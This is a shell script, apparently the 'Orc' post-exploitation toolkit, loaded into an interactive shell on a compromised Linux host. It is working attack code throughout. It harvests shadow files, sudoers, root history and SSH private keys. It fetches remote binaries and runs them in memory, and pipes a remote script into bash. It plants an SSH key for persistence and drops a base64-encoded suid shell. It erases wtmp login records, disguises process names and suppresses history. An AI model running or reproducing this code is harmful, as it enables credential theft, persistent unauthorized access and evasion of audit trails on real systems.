#!/bin/sh
# o.rc
OVERSION="0.4"
# NOTES
# new features! see readme/gethelp
# all the non-POSIX for loops have been removed
# all the SIGs in trap changed
# aliasing echo to /bin/echo to get around POSIX echo having no flags
# removed the non-POSIX [[ stuff ]]
# curl and dig now have wget and host as backups
# ipcalc should now be optional
# support for ip instead of ifconfig and arp
# Two base64 blobs used only by memexec() below, which decodes them and
# splices the fetched payload between them before piping the result to perl.
memfda=$(cat << EOF
IyEvdXNyL2Jpbi9lbnYgcGVybAp1c2Ugd2FybmluZ3M7CnVzZSBzdHJpY3Q7CgokfD0xOwoKbXkgJG5hbWUgPSAiIjsKbXkgJGZkID0gc3lzY2FsbCgzMTksICRuYW1lLCAxKTsKaWYgKC0xID09ICRmZCkgewoJZGllOwp9CgpwcmludCAiZmQgJGZkXG4iOwoKb3BlbiAobXkgJEZILCAnPiY9Jy4kZmQpIG9yIGRpZTsKc2VsZWN0ICgoc2VsZWN0KCRGSCksICR8PTEpIFswXSk7CgpwcmludCAkRkggcGFjayBxL0gqLywgcS8K
EOF
)
memfdb=$(cat << EOF
cHJpbnQgImRvbmVcbiI7CmV4ZWN7Ii9wcm9jLyQkL2ZkLyRmZCJ9ICJ0ZXN0IiwgIiIsICIiIG9yIGRpZTsK
EOF
)
# POSIX echo has no flags; /bin/echo accepts the -n/-e used throughout.
alias 'echo'='/bin/echo'
# /dev/shm/.q is the working directory created at the bottom of this file;
# it is removed when the shell exits or is interrupted.
trap "rm -rf /dev/shm/.q" EXIT TERM INT
# Creates a copy of this script in variable backup
# Should be started like "ENV=o.rc sh -i".
backup=""
if [ -r "$BASH_SOURCE" -a ! -r "$ENV" ]; then
# Script was started in bash via source.
ENV=$BASH_SOURCE
fi
if [ -r "$ENV" ]; then
# NOTE(review): $ENV is unquoted here, so a path containing whitespace breaks the copy.
backup=`cat $ENV`
# Convert to absolute file name for later use.
ENV=$(realpath "$ENV")
fi
# Real home directory of the current user; filled in at the bottom of the
# file after HOME has been redirected to /dev/shm/.q.
NHOME=""
getdbus() {
  # Enumerate every name registered on the system bus and on the session bus.
  # Arguments: none. Output: dbus-send replies on stdout, one bus after the other.
  local bus
  for bus in system session; do
    echo "Dbus services for $bus:"
    dbus-send "--$bus" --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames
  done
  echo "See https://github.com/taviso/dbusmap for additional dbus auditing!"
}
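getsec() {
  # Report which mandatory-access-control / hardening frameworks appear to be
  # present: SELinux (selinuxenabled exit status), AppArmor (aa-status on PATH)
  # and grsecurity/PaX (PaX flags in /proc/self/status).
  # Arguments: none. Output: one line per detected framework on stdout.
  echo "Let's see if there are any defences."
  # Test the exit status directly; `echo $? | grep -q 0` also matched
  # statuses such as 10 or 100.
  if selinuxenabled >/dev/null 2>&1; then
    echo "SELinux is enabled."
  fi
  if type aa-status >/dev/null 2>&1; then
    echo "AppArmor is probably installed."
  fi
  # stderr silenced so a missing /proc (non-Linux) does not print noise.
  if grep -q PaX /proc/self/status 2>/dev/null; then
    echo "GrSec and PaX live here."
  fi
}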
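log2outp() {
  # Run a command and capture its output under $OUTP.
  # Arguments: $1 - basename of the output files
  #            $2... - command and its arguments
  # Globals:   OUTP (read) - existing output directory
  # Outputs:   stdout of the command appended to $OUTP/<basename>.txt,
  #            stderr appended to $OUTP/<basename>.err, and the basename
  #            plus command line appended to $OUTP/log.txt
  # Returns:   1 if OUTP is unusable or an argument is missing,
  #            otherwise the exit status of the command
  if [ ! -d "$OUTP" ]; then
    echo 'output directory not defined or prepared' >&2
    return 1
  fi
  if [ $# -lt 1 ]; then
    echo 'missing basename of the output files' >&2
    return 1
  fi
  if [ $# -lt 2 ]; then
    echo 'missing command to execute' >&2
    return 1
  fi
  # All arguments are validated before log.txt is touched, so a rejected
  # call leaves no half-written entry behind.
  printf '%s\n' "$*" >> "$OUTP/log.txt"
  local out_name=$1
  shift
  "$@" >> "$OUTP/$out_name.txt" 2>> "$OUTP/$out_name.err"
}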
getinfo() {
# Collect command output into $HOME/files via log2outp and pack it into
# $HOME/f.tar.xz (falls back to an external xz, then to gzip).
# HOME is redirected to /dev/shm/.q at the bottom of this file, so the
# archive lands in the tmpfs working directory, not the real home.
# When running as root (or owner of /root) it also copies shadow, private
# keys, sudoers and root's history -- the archive is highly sensitive.
# Arguments: none. Globals: OUTP (written), HOME, EUID (read).
echo "Gathering useful command output."
echo "Find it in $HOME/f.tar.xz"
OUTP=$HOME/files/
mkdir --mode 700 $OUTP
log2outp passwd getent passwd
log2outp uname uname -a
log2outp ps ps -weFH
log2outp w w
log2outp last last -i
log2outp uptime uptime
log2outp id id
log2outp date date
log2outp cpuinfo cat /proc/cpuinfo
log2outp free free -g
log2outp route route -n
log2outp hosts cat /etc/hosts
log2outp resolve cat /etc/resolv.conf
log2outp rpcinfo rpcinfo
log2outp lsmod lsmod
log2outp lsusb lsusb
log2outp mount mount
log2outp df df
log2outp user_crontab crontab -l
if hash ifconfig 2>/dev/null; then
log2outp ifconfig ifconfig -a
else
log2outp ifconfig ip link
fi
log2outp netstat netstat -peanut
if [ "$EUID" = "0" -o -O "/root" ]; then
# Variable EUID is defined in the bash.
# Check EUID of /root works in dash (and in bash).
log2outp shadow getent shadow
log2outp ssh_keys find /home/ -name id_rsa
log2outp sudoers cat /etc/sudoers
log2outp crontab cat /etc/crontab
log2outp iptables iptables -L
log2outp secure cat /var/log/secure
log2outp roothist cat /root/.bash_history
log2outp sshd_config cat /etc/ssh/sshd_config
log2outp root_dir ls -al /root/
#inelegant hack
log2outp netstat netstat -peanut
# The three commands share one basename, so they append to the same
# sellinux.txt / sellinux.err files.
if hash getsebool 2>/dev/null; then
log2outp sellinux getenforce
log2outp sellinux getsebool -a
log2outp sellinux sestatus
fi
fi
# Stores all log files in one compressed tar archive.
tar -cJf $HOME/f.tar.xz $OUTP
if [ $? -gt 0 ]; then
# maybe the tar internal xz fail. Try an external xz compression.
tar -cf - $OUTP | xz -c -9 > $HOME/f.tar.xz
fi
if [ $? -gt 0 ]; then
# maybe xz command failed. Try the old gzip inside tar
tar -czf $HOME/f.tar.gz $OUTP
fi
# Remove the single log files. Keep only the archive file.
rm -rf $OUTP
}
timedshell() {
  # Placeholder: only prints the announcement, nothing is scheduled.
  printf '%s\n' "scheduling a reverse shell to launch later..."
}
listusers() {
# Listing users in passwd with login shells.
# Reject shells named *nologin or *false as valid shells.
# awk reads /etc/shells first (NF==1: lines without a ':'), collecting the
# accepted shells, then the passwd stream from stdin ('-') and prints the
# login name ($1) of every entry whose shell ($7) was collected.
getent passwd |
awk -F ':' '
NF==1 && $1 !~ /^#|nologin$|false$/ {shells[$1]=1}
$7 in shells {print $1}' /etc/shells -
}
getusers() {
  # Announce, then delegate the actual filtering to listusers.
  printf '%s\n' "Listing valid users with shells."
  listusers
}
getuservices() {
# Print the ps rows whose first column (the user) is not one of the
# shell-capable accounts from listusers. In the combined stream the
# single-field lines are user names, the multi-field lines are ps rows.
echo "Listing all running services with non-user accounts in passwd."
{ listusers; ps --no-header -weFH; } |
awk 'NF==1 {users[$1]=1}
NF>1 && !($1 in users) {print}'
}
getspec() {
  # Print a short hardware summary: RAM, CPU model, core count, disk usage.
  # Arguments: none. Output: human-readable lines on stdout.
  printf 'RAM available: '
  free -hm | tr '\n' ' ' | awk '{ print $8 }'
  printf 'CPU model:'
  # First line mentioning "name" in /proc/cpuinfo, value after the colon.
  awk -F ':' '/name/ { print $2; exit }' /proc/cpuinfo
  printf 'Number of cores: '
  grep -c processor /proc/cpuinfo
  printf 'Disk usage:'
  df -h
}
getidle() {
# List all ptys and their idle times accurately.
# Arguments : none
# Globals : our_pty could contain the number of our PTY
# our_pty is exported so that awk can read it through ENVIRON below.
export our_pty=$(tty | cut -d '/' -f 4)
# %X = last access time (epoch seconds), %U = owner; only /dev/pts/<digits>
# entries are kept and the leading path is stripped from $1.
stat /dev/pts/* -c '%n %X %U' |
awk -v now=$(date +%s) '$1 ~ /\/[0-9]+$/ {
gsub( /[^0-9]/, "", $1 )
list[$1]="PTY " $1 " is " now-$2 " seconds idle and owned by " $3
if( $1==ENVIRON["our_pty"] ) list[$1]=list[$1] " ** this is us **"}
END {for(i in list) print list[i]}'
# reminder: do not use gawk functions, e.g. systime
}
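srm() {
  # Overwrite (2 random passes plus a final zero pass) and unlink one file.
  # Arguments: $1 - path to the file
  # Returns: shred's exit status
  # Quoted and after -- so a path with whitespace or a leading dash is
  # passed to shred as a single operand.
  shred -vzfun 2 -- "$1"
}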
qssh() {
# ssh for callers without a tty: $1 (the password) is written in clear text
# into an SSH_ASKPASS helper under /dev/shm/.q and the remaining arguments
# are passed to ssh with host-key verification disabled.
# Arguments: $1 - password, $2... - ssh arguments
if tty | grep -q "not"; then
echo '#!/bin/bash' > /dev/shm/.q/.k
echo "echo $1" >> /dev/shm/.q/.k
chmod a+x /dev/shm/.q/.k
shift
DISPLAY="" SSH_ASKPASS="/dev/shm/.q/.k" ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -T $@
else
echo "You've got a tty. You can't use qssh."
fi
}
qsu() {
# sudo for callers without a tty: $1 (the password) is written in clear
# text into a SUDO_ASKPASS helper under /dev/shm/.q, sudo -A runs the
# remaining arguments, and the helper is removed afterwards.
# Arguments: $1 - password, $2... - sudo arguments
echo '#!/bin/bash' > /dev/shm/.q/.c
echo "echo $1" >> /dev/shm/.q/.c
chmod a+x /dev/shm/.q/.c
shift
SUDO_ASKPASS=/dev/shm/.q/.c sudo -A "$@"
rm /dev/shm/.q/.c
}
memexec() {
# Downloads $1 with curl, hex-encodes it with od, splices it between the
# two base64 blobs (memfda/memfdb) defined at the top of the file and
# pipes the assembled text to perl. $1 is unquoted and nothing checks
# the integrity of what was downloaded.
# Arguments: $1 - URL
memfile=$(curl -s $1 | od --endian=big -An -x | tr -d ' ' | tr -d '\n')
finalmem=$(echo $memfda | base64 -d)
finalmem=${finalmem}$(echo -ne "$memfile/ or die;\n")
finalmem=${finalmem}$(echo $memfdb | base64 -d)
echo "$finalmem" | perl
}
getpty() {
  # Start a pty-backed sh through script(1), re-reading this file via ENV.
  # Globals: ENV (read), SHELL (written)
  SHELL=$(command -v sh)
  if [ ! -r "$ENV" ]; then
    echo "ENV not defined. Can not start script."
    return
  fi
  ENV="$ENV" script -c sh /dev/null
}
getsuspect() {
#ask and ye shall receive
#this janky, awful shortcut
# Fetches a script from GitHub and pipes it straight into bash: no
# version pinning and no checksum, so whatever the remote serves runs.
curl https://raw.githubusercontent.com/zMarch/suspect/master/suspect.sh | bash
}
keyinstall() {
# Appends an ssh-rsa public key (placeholder text as shipped) to the
# current user's authorized_keys. NHOME is the real home directory,
# resolved at the bottom of this file.
touch /dev/shm/.q/.ssh
touch -r /
sshkey="ssh-rsa [YOUR KEY HERE] `whoami`@`hostname`"
echo $sshkey >> $NHOME/.ssh/authorized_keys
}
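psgrep() {
  # Show process-table lines matching the pattern in $1, dropping the grep
  # processes that this pipeline itself spawns.
  # Arguments: $1 - grep basic regular expression
  # The pattern is quoted and placed after -- so whitespace or a leading
  # dash inside it is not split into extra arguments or read as an option.
  ps -weFH | grep -v grep | grep -- "$1"
}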
getescape() {
# For every pid whose ps user column starts with our numeric uid, look at
# the inode of /proc/<pid>/root: inode 2 is the real filesystem root
# (ext filesystems only; other filesystems use a different number), so
# such a process is running outside the chroot we may be in.
ps --no-header aux | awk -F" " '{print $1" "$2}' | grep "^`id -u`"i | awk '{print $2}' | tr ' ' '\n' | while read i; do
if ls -di --color=never "/proc/$i/root/" | grep -qe "^2\ "; then
echo "process $i seems to be outside the jail..."
fi
done
}
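getjail() {
  # Look for signs that we are inside a chroot or a virtual machine.
  # Arguments: none. Output: one line per finding, or "Bare metal!".
  # TTT is the single flag used throughout; the original initialised a
  # lowercase ttt that the later checks never read.
  TTT=0
  echo "Checking to see if we're in one giant simulation..."
  # The real root directory has inode 2 on ext filesystems; a different
  # inode for / suggests a chroot (other filesystems may differ).
  if ls -di --color=never / | grep -vqe "^2.*/$"; then
    TTT=1
    echo "We're in a chroot."
  fi
  # stderr silenced: /proc may be missing and dmesg may be unreadable.
  if grep -qi "hypervisor" /proc/cpuinfo 2>/dev/null; then
    echo "Virtual machine!"
    TTT=1
  fi
  if dmesg 2>/dev/null | grep -qi "hypervisor"; then
    echo "Virtual machine!"
    TTT=1
  fi
  if dmesg 2>/dev/null | grep -qi "vboxvideo"; then
    echo "Virtual machine! (Virtualbox)"
    TTT=1
  fi
  if [ "$TTT" != "1" ]; then
    echo "Bare metal!"
  fi
}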
portscan() {
# TCP connect check of a fixed list of common ports on one host, using
# bash's /dev/tcp; prints the ports where the connect succeeded.
# Arguments: $1 - host name or address
porta="21 22 23 80 443 8080 8443 129 445 3389 3306"
echo "Starting portscan..."
echo $porta | tr ' ' '\n' | while read i;do
bash -c "echo '' > /dev/tcp/$1/$i" 2>/dev/null
if echo $? | grep -q 0; then
echo "Host $1 port $i open"
fi
done
}
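fpssh() {
  # Fetch the SSH host keys a remote host advertises, so their
  # fingerprints can be recorded or compared.
  # Arguments: $1 - host name or address
  # Returns: ssh-keyscan's exit status
  # Quoted so a host argument is never word-split into several operands.
  ssh-keyscan "$1"
}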
getip() {
#we use akamai and google here because they're gonna look less dodgy in SOC's lolgs
# Asks an external HTTP endpoint (curl, else wget) and then DNS (dig, else
# host) for the public address. Both HTTP paths skip TLS certificate
# verification (-k / --no-check-certificate).
echo "Attempting to get IP..."
echo -ne "HTTP says: "
if hash curl>/dev/null; then
curl -k https://whatismyip.akamai.com
echo -ne "\n(used curl)"
else
wget -qO- --no-check-certificate https://whatismyip.akamai.com
echo -ne "\n(used wget)"
fi
echo ""
echo -ne "DNS says: "
if hash dig>/dev/null; then
dig TXT +short o-o.myaddr.l.google.com @ns1.google.com | tr -d \"
echo -ne "(used dig)\n"
else
host -t txt o-o.myaddr.l.google.com ns1.google.com | grep descriptive | awk -F ' ' '{print $4}' | tr -d '"' | tr -d "\n"
echo -ne "(used host)\n"
fi
}
prochide() {
# Execute a program hidden behind a long program name.
# arguments: program to execute with optional arguments.
# method : use the longest command line of the current running
# processes as name of the program to start.
# ARGS collapses "$@" into one string that the inner bash re-parses, so
# arguments containing whitespace or quotes are not preserved as given.
ARGS="$@"
# awk keeps the longest line of `ps -o cmd`.
LONGARG=$(ps --no-header -wweo cmd | awk 'length(X)<length {X=$0}; END {print X}')
bash -c "exec -a \"$LONGARG\" $ARGS"
}
getnet() (
# Body runs in a subshell (parentheses instead of braces), so sorry() and
# the variables set here do not end up in the interactive shell.
# Prints the ARP/neighbour table, pings the broadcast address, copies the
# hosts from the user's known_hosts to /dev/shm/.q/kh and finally starts a
# background ping sweep that appends live addresses to /dev/shm/.q/ips.
#i'm sorry
sorry(){
#this needs work
# Ping sweep. With ipcalc the range is computed from the interface's
# broadcast address (ifconfig, else ip); without ipcalc only a /24 is
# handled. Every branch loops over the addresses with one ping each.
if hash ipcalc 2>/dev/null; then
echo "Pinging IPs in the background..."
if hash ifconfig 2>/dev/null; then
valid=$(seq -f $(ipcalc -n --minaddr --maxaddr `ifconfig | grep inet | grep -i broadcast | awk -F ' ' '{print $2" "$4}'` | awk -F "=" '{print $2 " "}' | sed s/0/%g/ |tr -d '\n' | awk -F'.' '{print $1"."$2"."$3"."$4" "$7" "$10}' | awk -F " " '{print $1" "$3" "$5}' | tr -d '\n'))
echo $valid | tr ' ' '\n' | while read i;do
if ping -c1 -q $i | grep -q "\ 0%"; then
echo $i is alive >> /dev/shm/.q/ips
fi
done
else
valid=$(seq -f $(ipcalc -n --minaddr --maxaddr `ip addr show | grep inet | grep -i "broadcast\|brd" | awk -F ' ' '{print $2}'` | awk -F "=" '{print $2 " "}' | sed s/0/%g/ |tr -d '\n' | awk -F'.' '{print $1"."$2"."$3"."$4" "$7" "$10}' | awk -F " " '{print $1" "$3" "$5}' | tr -d '\n'))
echo $valid | tr ' ' '\n' | while read i;do
if ping -c1 -q $i | grep -q "\ 0%"; then
echo $i is alive >> /dev/shm/.q/ips
fi
done
fi
else echo "No ipcalc. Checking if we've got a /24 and then pinging the first one..."
if hash ifconfig 2>/dev/null; then
if ifconfig | grep -q "255.255.255.0"; then
INPUT=$(seq -f `ifconfig | grep inet | grep -i broadcast | grep -v inet6 | grep "255.255.255.0" | head -n1 | awk -F " " '{print $2}' | awk -F '.' '{print $1"."$2"."$3".%g 1 254"}'`)
echo $INPUT | tr ' ' '\n' | while read i;do
if ping -c1 -q $i | grep -q "\ 0%"; then
echo $i is alive >> /dev/shm/.q/ips
fi
done
else
if ip addr show | grep -E '/24*.brd'; then
INPUT=$(seq -f `ip addr show | grep brd |grep "/24" | head -n 1| awk -F " " {'print $2'} | awk -F '.' '{print $1"."$2"."$3".%g 1 254"}'`)
echo $INPUT | tr ' ' '\n' | while read i;do
if ping -c1 -q $i | grep -q "\ 0%"; then
echo $i is alive >> /dev/shm/.q/ips
fi
done
fi
fi
fi
fi
}
valida=""
valid=""
echo "Let's see what we can find on the network..."
echo "ARP table:"
# arp -na prints addresses in parentheses; the awk FS extracts them.
if hash arp 2>/dev/null; then
arp -na | grep ether |awk -v FS="(\\\(|\\\))" '{print $2}'
else
ip neigh show | awk -F " " '{print $1}'
fi
echo "Pinging broadcast."
echo "Please wait..."
# Three pings, ten seconds apart, to the broadcast address of the first
# interface that reports one.
if hash ifconfig 2>/dev/null; then
ping -c3 -i 10 -b $(ipcalc -b `ifconfig | grep inet | grep -i broadcast | awk -F ' ' '{print $2" "$4}'` | awk -F "=" '{print $2 " "}' | tr -d "\n")
else ping -c3 -i 10 -b $(ip addr show | grep inet | grep brd | awk -F ' ' '{print $4}')
fi
echo "Broadcast ping is done."
echo "Pulling known hosts for your user and writing to /dev/shm/.q/kh..."
cat $NHOME/.ssh/known_hosts | awk -F ' ' '{print $1}' > /dev/shm/.q/kh
# The sweep keeps running after getnet returns.
sorry &
)
wiper() {
# Rewrites /var/log/wtmp through utmpdump without the entries matching $1
# and copies the modification time back and forth so wtmp's timestamp is
# unchanged. Needs write access to wtmp.
# Arguments: $1 - grep pattern of the entries to drop
cat /var/log/wtmp | utmpdump | grep -v "$1" > /dev/shm/.q/.l
touch -r /var/log/wtmp /dev/shm/.q/.l
cat /dev/shm/.q/.l | utmpdump -r -o /var/log/wtmp
touch -r /dev/shm/.q/.l /var/log/wtmp
}
getrel() {
  # Print the distribution name from the release file(s).
  # arguments: none
  # output : stdout, one line per PRETTY_NAME-style entry under /etc/*release
  # method : split on '=', keep keys containing PRETTY, strip the quotes.
  awk -F= '{
    if (toupper($1) ~ /PRETTY/) {
      gsub(/["]/, "", $2)
      print $2
    }
  }' /etc/*release
}
hangup() {
# Writes a fake "Segmentation Fault." line to another user's pty and then
# SIGKILLs the sshd process attached to it, dropping their session.
# Arguments: $1 - pts number (e.g. the N of /dev/pts/N)
echo "This is seriously rude..."
echo "Terminating PTS/$1"
OWNER=$(stat -c '%U' /dev/pts/$1)
SSH_PID=$(pgrep -a sshd | grep pts/$1 | cut -d ' ' -f 1)
echo "Owner of PTS is $OWNER"
echo "SSH PID is $SSH_PID"
echo "Segmentation Fault." > /dev/pts/$1
sleep 2
kill -9 $SSH_PID
}
getenum() {
# Print the kernel, glibc and dbus versions plus the name of PID 1.
echo "Doing some basic listing of the usual suspects..."
echo -ne "Kernel: "
uname -rv
echo -ne "glibc: "
# Executes the libc shared object itself (path taken from ldd of the id
# binary); glibc prints its version banner when run as a program.
`ldd $(command -v id) | grep libc.so | awk -F " " '{print $3}'` | grep -i version | grep -v crypt
echo -ne "dbus: "
dbus-daemon --version | grep Daemon
echo -ne "Init system is: "
# Fourth column of the ps output for PID 1, header line removed.
ps -p 1 | grep -v CMD| awk -F " " '{ print $4 }'
}
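gethelp() {
  # Print the command overview for this shell.
  # Globals: OVERSION (read)
  # The prochide line escapes $0 so the literal text "$0" is printed; the
  # previous double-quoted echo expanded it to the name of the running shell.
  cat <<EOF
A probably non-comprehensive list of functionality in Orc v$OVERSION.
[*] getenum - get kernel, glibc, and dbus versions
[*] getinfo - create a tar.xz of useful command output
[*] getrel - attempt to get the OS release file.
[*] getip - get external IP from akamai and google (HTTP and DNS)
[*] getjail - check if we're in a chroot/VM
[*] getsec - check if the big three security MAC programs are around
[*] getusers - pull all users with a shell
[*] getpty - pop a pty with script
[*] getidle - list all ptys and their idle times accurately.
[*] getnet - attempt to enumerate hosts on the local network with ping
[*] getsuspect - pull my suspect tool from github.
[*] getspec - grab some hardware information.
[*] getuservices - list all running services with non-user accounts in passwd
[*] getescape - attempt to escape chroot via bad privs on the /proc/ filesystem.
[*] getdbus - list all dbus services.
[*] memexec - execute a binary in-memory from a webserver - memexec [full URI] (x64 only)
[*] portscan - run a portscan against common ports - portscan [host]
[*] prochide - run a program with \$0 changed to the longest entry in ps - prochide [program + args]
[*] srm - alias for secure shredding of files.
[*] qsu - sudo without a tty - qsu [password] [normal arguments]
[*] qssh - ssh without a tty - qssh [password] [normal arguments]
[*] wiper - remove entries from wtmp - wiper [string to grep out]
[*] fpssh - pull ssh remote host fingerprints - fpssh [host]
[*] stomp - alias for touch -r (needs arguments)
[*] tools - check for common tools
[*] dropsuid - drop tiny suid shell - dropsuid > [file]
[*] hangup - terminate someones PTS by killing their SSH process. Very loud, DO NOT USE. - hangup [PTS NUMBER]
EOF
}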
# Session setup, run when the file is read through ENV. Everything below
# lives in the interactive shell: the tmpfs working directory, aliases
# that keep tools from writing history files, and the info banner.
mkdir /dev/shm/.q
cd /dev/shm/.q
alias 'stomp'='touch -r'
alias 'tools'='type dig perl python gcc nc openssl wget strace gcore nmap gdb curl wget tcpdump'
# base64-encoded ELF; gethelp describes it as a tiny suid shell.
alias 'dropsuid'='echo "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAA
AAAAAIAECACABAgHAAAABwAAAAUAAAAAEAAA6AEAAADpWJCDwAxQw7sAAAAA6bgXAAAAzYDrAem7
iIAECLgLAAAAMckx0usB6THJzYAAAC9iaW4vc2g=" | base64 -d'
alias 'psfull'='ps -weFH'
alias 'listener'='netstat -peanuto'
alias 'netgrep'='netstat -peanuto | grep'
alias 'getp'='getent passwd'
# The following aliases point each tool's history file at /dev/null,
# disable HSTS persistence for wget and viminfo/swap for vim, and make
# ssh skip known_hosts handling.
alias 'psql'='PSQL_HISTORY=/dev/null psql'
alias 'ssh'='ssh -T -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
alias 'less'='LESSHISTFILE=/dev/null less'
alias 'wget'='wget --no-hsts'
alias 'vim'='vim -ni NONE'
alias 'mysql'='MYSQL_HISTFILE=/dev/null mysql'
# No shell history, no core dumps.
unset HISTFILE
HISTSIZE=0
umask 002
ulimit -c 0
echo "=========== Info ==========="
echo "Short kernel info: "
uname -rni
echo "IP address on the network: "
if hash ifconfig 2>/dev/null; then
ifconfig | grep inet | grep -v inet6 | awk -F " " '{ print $2 }' | grep -v 127 | grep -v "::1$"
else
ip addr show | grep inet | grep -v inet6 | awk -F " " '{ print $2 }' | grep -v 127 | grep -v "::1$"
fi
echo -ne "We are uid "
id -uz;echo -ne " - "; echo -ne "(";whoami | tr -d '\n';echo ")"
echo -ne "Machine has been "
uptime -p
if [ -f /etc/machine-id ]; then
echo -ne "Unique Machine ID: "
cat /etc/machine-id
fi
echo "============================"
echo "=== Welcome to Orc Shell ==="
echo "Run gethelp to see a list of commands."
echo "/dev/shm/.q should be deleted upon exit."
PS1='$USER'"@`hostname`:"'$PWD'"$ "
# HOME is redirected to the tmpfs directory (getinfo writes there); the
# real home directory is kept in NHOME for keyinstall and getnet.
HOME="/dev/shm/.q"
NHOME=$(getent passwd | grep `id -u` | cut -d: -f 6)
#rm $ENV